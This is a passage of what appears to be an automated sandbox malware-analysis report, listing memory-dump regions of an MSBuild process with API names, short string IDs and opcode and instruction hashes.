                          • Snapshot File: hcaresult_3_2_12a0000_MSBuild.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          APIs
                          • FindCloseChangeNotification.KERNEL32 ref: 012ACCB2
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331692491.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_12a0000_MSBuild.jbxd
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: Tejq
                          • API String ID: 0-2468842661
                          • Opcode ID: c8f870b9d6f5101a44db6d23239a51e45f4b00893d6214659f3859da7d9bfde2
                          • Instruction ID: b157f2944b3361d243d2f1260e8c321a0834ba4867e1c5f60e7a554922eae8d3
                          • Opcode Fuzzy Hash: c8f870b9d6f5101a44db6d23239a51e45f4b00893d6214659f3859da7d9bfde2
                          • Instruction Fuzzy Hash: 16211A70A002898FDF249FA4D4A97AEBFB2FF85304F144529E402AB399DF744946CB94
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq
                          • API String ID: 0-2756854522
                          • Opcode ID: 9ae710eae01248a83eefa7d429e37d3a1a4565c0d40a8d585a3828fc160a0328
                          • Instruction ID: bb01d900589ee297e4bc4403066e141aa50c0a437df5e7ed06dd0b44d8bd832a
                          • Opcode Fuzzy Hash: 9ae710eae01248a83eefa7d429e37d3a1a4565c0d40a8d585a3828fc160a0328
                          • Instruction Fuzzy Hash: EC115531708A144FD7195B7C6814AAF3FA6AF86610F4801CAE91ACB792CE21EC0683D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq
                          • API String ID: 0-3676250632
                          • Opcode ID: 3856e8d9b5601566ad17812461446cab3b192cf52cfdf9152753533f50a47c15
                          • Instruction ID: 91b88bb5bf4b38a1f8d8399157289509b6c37624afdea3a85a74bd5bfcfbd31e
                          • Opcode Fuzzy Hash: 3856e8d9b5601566ad17812461446cab3b192cf52cfdf9152753533f50a47c15
                          • Instruction Fuzzy Hash: B611C831B18221CF8B6A17246C544393AABFBC63153042CAADE07CB3C5EF358C42D381
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: Tejq
                          • API String ID: 0-2468842661
                          • Opcode ID: 407b673ff5746f9ec108eca486d1c27a1e0c4d92230a6ac6101999d8489162f4
                          • Instruction ID: 95ff22bcc676cfed3fc12753e8896531fc1e543cea0785befafdbbf8caec0440
                          • Opcode Fuzzy Hash: 407b673ff5746f9ec108eca486d1c27a1e0c4d92230a6ac6101999d8489162f4
                          • Instruction Fuzzy Hash: 5421FCB0A002498FDF249FA5D55C7AEBFB6FF84308F104429E402AB398DF745946DB95
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,nq
                          • API String ID: 0-1069744364
                          • Opcode ID: 54699b85ebe1eb6ccbfaf7abdf4566eaf6e55e6b683bc020f4c76c99ecd7981f
                          • Instruction ID: 284cf8c8abea79f4db72d77a33c72b1790fb6762617db4f3ca8133b7ab62369c
                          • Opcode Fuzzy Hash: 54699b85ebe1eb6ccbfaf7abdf4566eaf6e55e6b683bc020f4c76c99ecd7981f
                          • Instruction Fuzzy Hash: D5112E75B001058FCB04DF69C95496EBBB5BF85311F158066E905EB365DB70ED01CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq
                          • API String ID: 0-3676250632
                          • Opcode ID: a0dffffa4d4aee07a336a540c3cb4a3cf5ac4ae37d93fb201585f88c4070b872
                          • Instruction ID: f6631c56bc0112792d279bd18ae5f28e0d2196c3517f6f222459f0cf263d7e95
                          • Opcode Fuzzy Hash: a0dffffa4d4aee07a336a540c3cb4a3cf5ac4ae37d93fb201585f88c4070b872
                          • Instruction Fuzzy Hash: F501F776708301CFDF10594A9941B73BB7EEBE2122F45587BDB0CA7591D66248068691
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3d26923a5a28039821f0781f0d19b2f5b24288484ba1c7e51261a1f3804ca3cc
                          • Instruction ID: 72d4ccf2605b296229d96376dc038d30fb18c03d6f632e91edf6c610de0e0ed0
                          • Opcode Fuzzy Hash: 3d26923a5a28039821f0781f0d19b2f5b24288484ba1c7e51261a1f3804ca3cc
                          • Instruction Fuzzy Hash: 3D623A31A0161A8FCB15CF58C5C4AAEF7B2FF48304F258659D856EB225D735EC82CB94
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c685b41335ef72c0994bd97c32e3a1821b82768ba6fca872b7bebfd2c1614250
                          • Instruction ID: 8fdce61d86cf897d534197cd3c87d1e17b6cb9f78fb6486217a86f5e2324598d
                          • Opcode Fuzzy Hash: c685b41335ef72c0994bd97c32e3a1821b82768ba6fca872b7bebfd2c1614250
                          • Instruction Fuzzy Hash: A612C235B006058FCB14DF68C984E6A7BF6BF89350B2584A8E916DB375DB31EC41CBA0
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 86639122b255cd0ff3f3e9840278db8a79d048a54d8f5a429aba450d649bf1cd
                          • Instruction ID: 6c0455b19b461d713738f2af9b03b4558a4edc75bef0528ba87d331ab6911167
                          • Opcode Fuzzy Hash: 86639122b255cd0ff3f3e9840278db8a79d048a54d8f5a429aba450d649bf1cd
                          • Instruction Fuzzy Hash: 1B120D35B102198FDB14EF64C994AADBBB2BF89300F5085A8D44AAB365DF70ED85CF50
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3fc02c8204b5ffadb5350adbb5e4b431d35a4122dae6af745d7c67edc0a9f2d1
                          • Instruction ID: a561ae508bc5fd6f5e9cad7e600704f56043509733fb8972003c0125a61bad6c
                          • Opcode Fuzzy Hash: 3fc02c8204b5ffadb5350adbb5e4b431d35a4122dae6af745d7c67edc0a9f2d1
                          • Instruction Fuzzy Hash: 7CF18230A0121ACFEF14DB54CA50FAEB7BABF44304F5059A9DA09A73D4EB719E44CB91
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a4fc5042deaaf4bcaf20297b741dd9f66e051e34a8030f385515ae886fcafa6
                          • Instruction ID: 37b1bb1a845f68bc262034eab8a82de4f5a182d3983c534bb4318e65dd45cb09
                          • Opcode Fuzzy Hash: 5a4fc5042deaaf4bcaf20297b741dd9f66e051e34a8030f385515ae886fcafa6
                          • Instruction Fuzzy Hash: 65C146353101064FDB485BAEC8EC66EA6EFAFDA704F50483D6607C62A9DEB58C0687D1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 216dd8bd8f89535f7a6afca6bb94685ceba3da088888605359fac017af33d040
                          • Instruction ID: dcd247560cca100203636d1d9438ed30603b09093525e7b6531714e35eb70f79
                          • Opcode Fuzzy Hash: 216dd8bd8f89535f7a6afca6bb94685ceba3da088888605359fac017af33d040
                          • Instruction Fuzzy Hash: A4B1E330704302DBEF146956C698F6BE5EFAFE5606FD04C7E970A872D4EEE45C0086A1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c2f9924da10c0ae93b601970d13980305d12a7f4329846a0b0532d8903d7a59d
                          • Instruction ID: 63cc3b024b2a89208224ca5fbbd766219e2ef175a36f20afce2dbd569da48a96
                          • Opcode Fuzzy Hash: c2f9924da10c0ae93b601970d13980305d12a7f4329846a0b0532d8903d7a59d
                          • Instruction Fuzzy Hash: 0EE14934A00605DFCF14DFA9D984AAEBBF2FF88310F1485A9E91697365DB31AC46CB40
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e4b268d547f782a3ed94054aab85f779410fe9522b60290f9379d8d408b0e480
                          • Instruction ID: aa45e40ea21f3c71ef378e58c55d174d88462c762360e33f95042349a021f2a1
                          • Opcode Fuzzy Hash: e4b268d547f782a3ed94054aab85f779410fe9522b60290f9379d8d408b0e480
                          • Instruction Fuzzy Hash: 6791B177929100EFF7119B28F883EA47F32FB5D3247D81145EF41DA212EA34ACA98B54
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3b86bea5aa72a055f8ce31ad7adf26d6d39236389b72053a399df8f0f5d2acb2
                          • Instruction ID: 47faa65d7e1a99d5e7df627d7fd69e6a5da1b8e14d5e34804759774fcf1876e1
                          • Opcode Fuzzy Hash: 3b86bea5aa72a055f8ce31ad7adf26d6d39236389b72053a399df8f0f5d2acb2
                          • Instruction Fuzzy Hash: FFA15C357006188FCB05EF68C568D6E7BB2BF89700F108669E5069B3A4DF74ED46CB91
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 39e422f4abf36d467527277ac51db6769a26f493601c574687d0072a6b07a4c9
                          • Instruction ID: 096efef287de00a742e74f6aab6f9a6ab31c1ed2305ce94f801d4c52a02988b1
                          • Opcode Fuzzy Hash: 39e422f4abf36d467527277ac51db6769a26f493601c574687d0072a6b07a4c9
                          • Instruction Fuzzy Hash: 2EA19D316007408FCB64DF68D5847AABBF2FF88310F5459ADD5468BA92DF34E84ACB51
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0b6bf02d1d9c796e7567d0f10d23ded1ce4842be1ad15734dd64a13939152e3
                          • Instruction ID: 41434b883b3cb5ca8fc93c38adb32f238ecbbf7181e6bc3e9720793f78e61d7e
                          • Opcode Fuzzy Hash: a0b6bf02d1d9c796e7567d0f10d23ded1ce4842be1ad15734dd64a13939152e3
                          • Instruction Fuzzy Hash: A2A170317046548FDB25DB29C448E7ABFF2BF86310F19869DE49ACB692DB34E841CB50
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cd75751be2387d7e4be4532476fc29f8b4124884fe714f4c0fb423ccddf5ee27
                          • Instruction ID: b67920b236c8e2a86d9fc2c5d0a835adfaad93f36dd636656380bb68f04d555a
                          • Opcode Fuzzy Hash: cd75751be2387d7e4be4532476fc29f8b4124884fe714f4c0fb423ccddf5ee27
                          • Instruction Fuzzy Hash: 5CA18470D002298BCF14CF99D8906ADFBF5FF80318B589A66E456E7256E774DD82CB80
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 609e65eaef3e81043647e5c32dcb830bb8737f9ada74d9e7a05f59d385076f87
                          • Instruction ID: e2d4f010b974697644d243792c9cd9ac97bd23e8d4b492d544a18d683b6841ee
                          • Opcode Fuzzy Hash: 609e65eaef3e81043647e5c32dcb830bb8737f9ada74d9e7a05f59d385076f87
                          • Instruction Fuzzy Hash: 99016DB0901B108FD324DF2AD845782BBE1FF88300F04892DC29E87622EB74A80ACB40
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f5bf70d7401e1bfe6ee774fa4d64387b413ae534c3037b096aaf28b925ef8f46
                          • Instruction ID: dc1e01485a0fbb920539182f5c9f90b0d3ee300c5435e74d18c21b236ee7d7b9
                          • Opcode Fuzzy Hash: f5bf70d7401e1bfe6ee774fa4d64387b413ae534c3037b096aaf28b925ef8f46
                          • Instruction Fuzzy Hash: 6B918C36B012149FCB15CFA9E598AADBBB2FF88311F148069E912DB390DB71ED45CB50
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 42a92b29ee3c943fe8b801c38a709f8c3519a28c7937adc8dcfd77ca3f1dbcf3
                          • Instruction ID: 56035900ba98688f9e02af7af415200cabc520dbd5fa209c20be7dc58adbbafd
                          • Opcode Fuzzy Hash: 42a92b29ee3c943fe8b801c38a709f8c3519a28c7937adc8dcfd77ca3f1dbcf3
                          • Instruction Fuzzy Hash: 9BB12774A00A168FCB15CF68C584AAEF7F2FF48304F68C559D46AA7224D735F892CB90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 878fdac20b5b39f7d9e7b1275bef77f8a5e35950cb3c5216020a04a6818207ec
                          • Instruction ID: 94f59d3099a8a62bd8e85b63699071ad5271d0f44d03f9d3131e50eb2260c03a
                          • Opcode Fuzzy Hash: 878fdac20b5b39f7d9e7b1275bef77f8a5e35950cb3c5216020a04a6818207ec
                          • Instruction Fuzzy Hash: 169148357402049FDB08EF68D994E6A77A2EF89710F208569E602CF3B9DB71EC41CB90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 973408effed043466c83c70d88a75bd134cf511afaafacae8687caedb7b7965c
                          • Instruction ID: 8457e34d3f9c1c435e1226d361c2053893dc4890a5151abb8ca9b62a67ba960c
                          • Opcode Fuzzy Hash: 973408effed043466c83c70d88a75bd134cf511afaafacae8687caedb7b7965c
                          • Instruction Fuzzy Hash: 26917D31A00B058FDB28EF69D4407ABBBE6FF84314F10892DD19A8B755DB74E906CB90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 55762596bb8d6691ac340b04eb740d6a391c0fa2e28b3e86078bfc90d9a53a1b
                          • Instruction ID: 8af24274f23a48525eb6466cfb9f6385fe89039d0cc718161f74bc574b09aa04
                          • Opcode Fuzzy Hash: 55762596bb8d6691ac340b04eb740d6a391c0fa2e28b3e86078bfc90d9a53a1b
                          • Instruction Fuzzy Hash: 44812A35B10214DFDB54EF68D498E6EBBB6BF89710F1481A9E5069B3A5CB30EC41CB90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a32a814b922f9f71f14074a31d908407fb26afe248b62ce499331d3dde0698de
                          • Instruction ID: a99435252c7333cb5d18df4b5a69ad9825fc5dd8f2a61a09afa3e4a3a9bd5b74
                          • Opcode Fuzzy Hash: a32a814b922f9f71f14074a31d908407fb26afe248b62ce499331d3dde0698de
                          • Instruction Fuzzy Hash: DA81F635A006188FCB14DF68C588D9EBBF6FF88311B1681A9E8169B374DB71ED41CB94
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7bbd4732df7e273fc208893a739a64a5e7b2dc34b37586c32abf69a441b972bb
                          • Instruction ID: 735fec8644e55784039ba5bca145b0b8c5efd04e4d473a567dcfdcb9878db56b
                          • Opcode Fuzzy Hash: 7bbd4732df7e273fc208893a739a64a5e7b2dc34b37586c32abf69a441b972bb
                          • Instruction Fuzzy Hash: C8813C35700619CFCB19EF68C558AADBBB2BF89700F1085ADD4029B3A1DB75DD46CB90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d2c713b580e6facf49d44236063f3e3cb2fd5ad690c1718c51bb08193e9467a
                          • Instruction ID: 1faa2f44cb515f46c24b3777189df0bba5eb3c005a8c3a3a994fec7af715d766
                          • Opcode Fuzzy Hash: 2d2c713b580e6facf49d44236063f3e3cb2fd5ad690c1718c51bb08193e9467a
                          • Instruction Fuzzy Hash: 39914934A01255DFEB24DB68E598BAEBBB3FF84304F104168E506AB391CF749D46CB41
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f280126a2f848e867eb11ac3bc37df0b34fd24cc36639bbfb902b9dbe7115779
                          • Instruction ID: 69c5885bc5df6d4f3558cbd063a9c1e0941666bb49923c1132f7c4021b943da4
                          • Opcode Fuzzy Hash: f280126a2f848e867eb11ac3bc37df0b34fd24cc36639bbfb902b9dbe7115779
                          • Instruction Fuzzy Hash: 9F810A74A00214CFCB54DFA8C594AADBBF2FF88314F254169E90AAB365CB71AD46CF50
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6c2fa889d0bcc49e6162dc90825441d993765aa0f8e83a19049326451d08aad6
                          • Instruction ID: 36879324d2b47348f75509d1182e96d58728aa0161d930e2d6297ad0e27445bb
                          • Opcode Fuzzy Hash: 6c2fa889d0bcc49e6162dc90825441d993765aa0f8e83a19049326451d08aad6
                          • Instruction Fuzzy Hash: 5A615E35E1021A8FDF14CFA4C5546EEBBB6FF89304F14892AE905BB394EB719945CB80
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0e07979fff08ec6f361b9af2c99d0e069d8bbdb18f21e0b50a0483c6c453bb2
                          • Instruction ID: 644b49992c0868894d27a066bbaa7124888f9ce7d6a8a8646b87a7d93e6ec3f0
                          • Opcode Fuzzy Hash: a0e07979fff08ec6f361b9af2c99d0e069d8bbdb18f21e0b50a0483c6c453bb2
                          • Instruction Fuzzy Hash: 52414334B09201CFD718DB29E098BB97BE7BB88351F5580B9D40A87399DB799C45C741
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: af33c95300c55246491347a6751ade458bab4a658f6f87c9bae4a5563feadbbe
                          • Instruction ID: c55d66b311047e00923979e847865aabe051213cedcd18efbd769afa111ae2fe
                          • Opcode Fuzzy Hash: af33c95300c55246491347a6751ade458bab4a658f6f87c9bae4a5563feadbbe
                          • Instruction Fuzzy Hash: B231FB302506504BD728FB64E550BAB7BAAFFC0300F508A6CD2464B659DF78ED0ECB95
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 64b65d0602036b3b8a6b6328228f12f86307da47b66d5c56610fd25ef57cc812
                          • Instruction ID: 4051496b01ae3c547da4fadc7a4e146b2b5a38e62c802c4b771a0fb3137c8c64
                          • Opcode Fuzzy Hash: 64b65d0602036b3b8a6b6328228f12f86307da47b66d5c56610fd25ef57cc812
                          • Instruction Fuzzy Hash: FA319034A007028FC768EF78D59062EBBB6FF84364B500B2CD15687694DF35E946CB91
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e7117a64a184276408bab91390edb40f26c05d6454d767924a8ba89ab5da3ee4
                          • Instruction ID: db8eeb3f0d0920c868de44acc122325fc35f403a74a26b668eba5f9634d8e197
                          • Opcode Fuzzy Hash: e7117a64a184276408bab91390edb40f26c05d6454d767924a8ba89ab5da3ee4
                          • Instruction Fuzzy Hash: 28216A74B087415FDB15A525C898F3BABAFBFC2611F0A88BE91118B2C4CE65D801CB94
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3d98b3443431e2db80767d6069d9546ecfa3abf53f5ae6a6d0448dffaed22771
                          • Instruction ID: 15679d4e265c98c9b841f6b11be55acdc8c6762fbf8e791e9c1843ba0d41c802
                          • Opcode Fuzzy Hash: 3d98b3443431e2db80767d6069d9546ecfa3abf53f5ae6a6d0448dffaed22771
                          • Instruction Fuzzy Hash: 4C318D357006159FDB29AF21D844A7ABBB6FF85341B14886DE9128B3A4DF31EC46CB50
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 135b279d6ea203e79b0aaffad30d8577ae848f1710c0fc967ede5fd968955e6c
                          • Instruction ID: d518ad28e884b1802f0f1db9b379ebec0e577acb9cc268c15b3d3bf0f0c4bc3e
                          • Opcode Fuzzy Hash: 135b279d6ea203e79b0aaffad30d8577ae848f1710c0fc967ede5fd968955e6c
                          • Instruction Fuzzy Hash: AA314870A002099FDB18DF68D548AA9B7F2BF4C314F108069D906E7365DB749D45CB90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f3509e5950505fedc52cf4f9d068384babbcd7db4743e9c080b2361af714b39d
                          • Instruction ID: 43746c76c4cd77c9221ebdd6485751d9eac4b8a5744573b9e25173dc50f79fad
                          • Opcode Fuzzy Hash: f3509e5950505fedc52cf4f9d068384babbcd7db4743e9c080b2361af714b39d
                          • Instruction Fuzzy Hash: 7231D734A01225CFEF28DB14CA60FB9B3B6BF54605F4169D99A0AAB3D0D730AD40CE91
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cb7f39155fe33b42e40416358227218f35198cc25f304c49f12fea2a79da5afd
                          • Instruction ID: 34dfc7326393fb1ae5163e510537bb6a071a209f1ce784a174b2e51aad09a858
